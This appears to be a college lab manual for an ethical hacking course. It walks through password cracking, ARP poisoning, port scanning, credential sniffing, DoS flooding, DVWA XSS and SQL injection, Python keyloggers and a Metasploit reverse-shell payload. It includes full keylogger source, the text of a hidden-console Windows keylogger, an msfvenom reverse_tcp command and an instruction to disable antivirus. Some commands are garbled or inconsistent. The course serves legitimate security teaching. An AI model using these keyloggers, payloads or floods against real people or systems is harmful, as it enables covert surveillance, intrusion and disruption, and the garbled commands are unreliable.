Rizvi College of Arts, Science and Commerce, Bandra

TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

B.SC (CS) THIRD YEAR

Course: USCSP604 (Credits: 01 Lectures/Week: 03)
Practical of Skill Enhancement
USC 607: Ethical Hacking
1. Use Google and Whois for Reconnaissance

2. A) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm

B) Use Cain and Abel for cracking Windows account password using Dictionary

attack and to decode wireless network passwords

3. A) Run and analyze the output of following commands in Linux – ifconfig, ping,

netstat, traceroute

B) Perform ARP Poisoning in Windows

4. Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,

NULL, and XMAS

5. A) Use Wireshark (Sniffer) to capture network traffic and analyze

B) Use Nemesy to launch DoS attack

6. Simulate persistent cross-site scripting attack

7. Session impersonation using Firefox and Tamper Data add-on.

8. Perform SQL injection attack

9. Create a simple keylogger using python

10. Using Metasploit to exploit (Kali Linux)

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTICAL NO.1

AIM: Use Google and Whois for Reconnaissance.

Using who.is

Step1: Open the WHO.is website

Step 2: Enter the website name and hit the “Enter button”.

Step 3: Show
you
information
about

www.google.co.in
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTICAL NO. 2

2.1) Use CryptTool to encrypt and decrypt passwords using RC4 algorithm.
Step 1:

Step 2:
● Click Encrypt/Decrypt Tab
● Select Symmetric (Modern)
● Using RC4.

Step 3: Encryption using RC4

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 4:Decryption using RC4

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords

Step 1:- Click on HASH Calculator

Step 2:- Enter the password to convert into hash Paste the value into the field you have converted

e.g(MD5)
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 3:- Right Click on the hash and select the dictionary attack

Step 4:- Then right click on the file and select (Add to List) and then select the Wordlist

Step 5:- Select all the options and start the dictionary attack
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTICAL NO. 3
3.1) Using Traceroute, ping, ifconfig, netstat Command

Step 1: Type tracert command and type www.google.com press “Enter”.

Tracert:-
The tracert command is a Command Prompt command that's used to show several details about the
path that a packet takes from the computer or device you're on to whatever destination you specify.
Syntax
Tracert [-d] [-h MaxHops] [-w TimeOut] [-4] [-6] target [/?]
Traceroute
Traceroute is a command which can show you the path a packet of information takes from your
computer to one you specify. It will list all the routers it passes through until it reaches its destination,
or fails to and is discarded. In addition to this, it will tell you how long each 'hop' from router to router
takes.

Step 2: Ping all the IP addresses

Ping:-
The ping command is a Command Prompt command used to test the ability of the source computer to
reach a specified destination computer. The ping command is usually used as a simple way to verify
that a computer can communicate over the network with another computer or network device.
Syntax
Ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [-w timeout] [-R]
[-S srcaddr] [-p] [-4] [-6] target [/?]
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 3:- run ipconfig/ifconfig

Ipconfig/Ifconfig
Ipconfig is a DOS utility that can be used from MS-DOS and the Windows command line to display the
network settings currently assigned and given by a network. This command can be utilized to verify a
network connection as well as to verify your network settings.
Syntax
ipconfig [/all compartments] [/? | /all | /renew [adapter] | /release [adapter] | /renew6 [adapter] |
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

/release6 [adapter] | /flushdns | /displaydns | /registerdns | /showclassid adapter | /setclassid adapter

[classid] | /showclassid6 adapter | /setclassid6 adapter [classid] ]

Step 4:- run Netstat

The netstat command, meaning network statistics, is a Command Prompt command used to
display very detailed information about how your computer is communicating with other computers or
network devices. Specifically, the netstat command can show details about individual network
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

connections, overall and protocol-specific networking statistics, and much more, all of which could
help troubleshoot certain kinds of networking issues.
Syntax
netstat [-a] [-b] [-e] [-f] [-n] [-o] [-p protocol] [-r] [-s] [-t] [-x] [-y] [time_interval] [/?]

Step5:- run ARP command

ARP command to view and modify the ARP table entries on the local computer. This
may display all the known connections on your local area network segment (if they have
been active and in the cache). The arp command is useful for viewing the ARP cache
and resolving address resolution problems.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Syntax (Inet means Internet address)

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]]
[-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

On Linux
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

3.2) Perform ARP Poisoning in Windows

Step 1: Download and install Cain &Abel software in VMware.
Step 2: GO to
sniffer and
then click on
configuration,
select the
appropriate
wireless
adapter. Click
on apply and
then click on
Ok button.
Step 3:

Activate sniffer
Step 4: click on + icon. Check all tests checkbox and then click ok
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

.Step 5: click on APR then click on blank screen and then click on the + icon. Select any IP
address(IPv4 address)

Step 6: select all the IP address and MAC address and then click on OK

Step 7: Apply ARP.

Step 8: Go to any website on source ip address.

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 9: Go to password option in the cain & abel and see the visited site password.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTICAL NO. 4

AIM: Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, and XMAS.

NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it
is installed properly. Now type the below commands.
#nmap ip address

● ACK -sA (TCP ACK scan)

It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

● SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

● FIN Scan (-sF)

Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

● NULL Scan (-sN)

Does not set any bits (TCP flag header is 0)

Command: nmap –sN –p 22 scanme.nmap.org

● XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTCAL NO. 5
5.1) Use WireShark sniffer to capture
network traffic and analyze.
Step 1: Install and open WireShark.

Step 2: Go to Capture tab and select option.

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 3: In input, Select Connection and click on start.

Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.

Step 5: Open a website in a new window and enter the user id and password. Register if needed.

Step 6: Enter the credentials and then sign in.

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 7: The WireShark tool will keep recording the packets.

Step 8: Select filter as http to make the search easier and click on apply.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 9: Now stop the tool to stop recording.

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 10: Find the post methods for username and passwords.

Step 11: U will see the email- id and password that you used to log in.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

5.2) Use Nemesy to launch DoS attack

● Ping of Death
We will assume you are using Windows for this exercise. We will also assume that you have at least
two computers that are on the same network. DOS attacks are illegal on networks that you are not
authorized to do so. This is why you will need to setup your own network for this exercise.
● Open the command prompt on the target computer
● Enter the command ipconfig. You will get results similar to the ones shown below

For this example, we are using Mobile Broadband connection details. Take note of the IP address.
Note: for this example to be more effective, and you must use a LAN network.
● Switch to the computer that you want to use for the attack and open the command prompt.
● We will ping our victim computer with infinite data packets of 65500.
● Enter the following command
ping 10.128.131.108 –t |65500
HERE,
● “ping” sends the data packets to the victim
● “10.128.131.108” is the IP address of the victim
● “-t” means the data packets should be sent until the program is stopped
● “-l” specifies the data load to be sent to the victim
You will get results similar to the ones shown below

Flooding the target computer with data packets doesn’t have much effect on the victim. In order for the
attack to be more effective, you should attack the target computer with pings from more than one
computer.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

The above attack can be used to attacker routers, web servers etc.
If you want to see the effects of the attack on the target computer, you can open the task manager and
view the network activities.

● Right click on the taskbar

● Select start task manager
● Click on the network tab
● You will get results similar to the following

If the attack is successful, you should be able to see increased network activities.
● Hacking Activity: Launch a DOS attack
In this practical scenario, we are going to use Nemesy to generate data packets and flood the target
computer, router or server. As stated above, Nemesy will be detected as an illegal program by your
anti-virus. You will have to disable the anti-virus for this exercise.

● Download Nemesy from http://packetstormsecurity.com/files/25599/nemesy13.zip.html

● Unzip it and run the program Nemesy.exe
● You will get the following interface
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Enter the target IP address, in this example; we have used the target IP we used in the above example.
HERE,

● 0 as the number of packets means infinity. You can set it to the desired number if you do not
want to send, infinity data packets
● The size field specifies the data bytes to be sent and the delay specifies the time interval in
milliseconds.

Click on send button

You should be able to see the following results

The title bar will show you the number of packets sent
Click on halt button to stop the program from sending data packets.
You can monitor the task manager of the target computer to see the network activities.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

PRACTICAL No. 6
AIM: Simulate persistent cross-site scripting attack
Step 1: Open XAMPP and start apache and mysql

Step 2: Go to Localhost: 8080/setup.php and login using username: admin; password: password.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 3: Opens the home page.

Step 4: Once logged in we want to navigate to the DVWA Security tab, select “Low” in the
drop-down box, and hit Submit.

Step 5: Stored Cross Site Scripting

 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 6: Reflected Cross Site Scripting

OUTPUT
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 7: DOM Cross Site Scripting (Persistent XSS)

OUTPUT

PRACTICAL NO. 8
AIM: Perform SQL injection attack.
 Rizvi College of Arts, Science and Commerce, Bandra
TYB.SC CS 6th SemEthical HackingDr. Ruchi Gupta

Step 1: Open XAMPP and start apache and mysql and Go to web browser and enter site
http://localhost/phpmyadmin/

Step 2: Create database with name DVWA.

Step 4: Go to site localhost:8080/setup.php after login and click on setup/reset database.

Connect with database

Step 5: Click on SQL injection option in left. Write “1’ or ‘=’” in text box and click submit
Step 6: Write "1" in text box and click on submit.

Step 7: Write "1=1" in text box and click on submit.

Step 8: Write "1*" in text box and click on submit.

 PRACTICAL NO. 9

AIM : Create a simple keylogger using python

Import
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()

Keylogger for Windows

Download some python libraries
1) pywin32
2) pyhook
In CMD pip install pywin32
& if it won't work:
After I copy pywintypes26.dll and pythoncom26.dll
from C:\Python26\Lib\site-packages\pywin32_system32 to C:\Python26\Lib
\site-packages\win32

Steps to download pyHook:

1) You're gonna wanna
visit https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook download the version with
"36" in the name.
2) Open cmd
*On cmd change directory into the location where pip and the whl file are stored, type
pip install (whl name with 36 in the version name)
3)on cmd type :- pip install pyHook-1.5.1-cp36-cp36m-win32.whl

Following is the code to create keylogger in python

# Python code for keylogger to be used in windows
import win32api
import win32console
import win32gui
import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f = open('c:\output.txt', 'r+')
buffer = f.read()
f.close()
# open output.txt to write current + new keystrokes
f = open('c:\output.txt', 'w')
keylogs = chr(event.Ascii)
if event.Ascii == 13:
keylogs = '/n'
buffer += keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
Save the file in C:\ as Keylogger.py and run the python file
Output:
The keylogger will be started in the background and save all the data on the log file “c:\output.txt”.

Keylogger in Linux
pyxhook requires python-xlib. Install it if you don’t have it already.
In Terminal Type:-
$sudo apt-get update
$sudo apt-get install python-xlib
$sudo apt install python-pip
$pip install pyxhook

# Python code for keylogger to be used in linux

import os
import pyxhook
log_file = os.environ.get( 'pylogger_file', os.path.expanduser('~/Desktop/file.log') )
# Allow setting the cancel key from environment args, Default: `
cancel_key = ord( os.environ.get( 'pylogger_cancel', '`')[0] )
# Allow clearing the log file on start, if pylogger_clean is defined.
if os.environ.get('pylogger_clean', None) is not None:
try:
os.remove(log_file)
except EnvironmentError:
# File does not exist, or no permissions.
pass
#creating key pressing event and saving it into log file
def OnKeyPress(event):
 with open(log_file, 'a') as f:
f.write('{}\n'.format(event.Key))
# create a hook manager object
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
# set the hook
new_hook.HookKeyboard()
try:
new_hook.start() # start the hook
except KeyboardInterrupt:
# User cancelled from command line.
pass
except Exception as ex:
# Write exceptions to the log file, for analysis later.
msg = 'Error while catching events:\n {}'.format(ex)
pyxhook.print_err(msg)
with open(log_file, 'a') as f:
f.write('\n{}'.format(msg))

Output:
The keylogger will be started in the background and save all the data on the file.log file
“/home/akash/Desktop”.
 PRACTICAL NO. 10
AIM: Using Metasploit to exploit
Step 1:

● We will download Virtual box and install it.

● Download and install Kali distribution.
● Download and install Metasploitable which will be our hacking machine.
● Download and install Windows XP which will be another hacking machine.
Step 2:

● First of all, open the Metasploit console in Kali.

● You can do so by following the path: Applications → Exploitation Tools → Metasploit.

● Once you open the Metasploit console, you will get to see the following screen. Highlighted in red
underline is the version of Metasploit.
 Step 3: use following command to install Metasploit-framework. After running this command, you will
have to wait several minutes until the update completes.
apt install metasploit-framework

apt

update
Step 4: First we Create payload using command line in Kali Linux
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.159 lport=4444 -f exe -a
x86 > Hack.exe

After successfully creating payload Hack.exe, copy that payload in to the victim’s PC (Windows).

Step 5: Exploit using Command Prompt

 ● Now we will use an exploit that can work for us. Open metasploit and set handler:
Using following command
root@kali:~# msfconsole

Step 6: After that run these command to set Local host

msf5>use exploit/multi/handler
msf5 exploit(multi/handler)>set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler)>>set lhost 192.168.43.159
msf5 exploit(multi/handler)>>set lport 4444
msf5 exploit(multi/handler)>>show options
Step
7:
After that run these command to set Remote host
msf5>use exploit/multi/handler
msf5 exploit(multi/handler)>set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler)>>set rhost 192.168.43.99
msf5 exploit(multi/handler)>>set rport 80
msf5 exploit(multi/handler)>>show options
Step
8: after

successful exploit
Step
9:
capture the session on remote host type the command screenshot its capture the victim Pc screenshot and save in root
directory.

File store in root directory

Capture output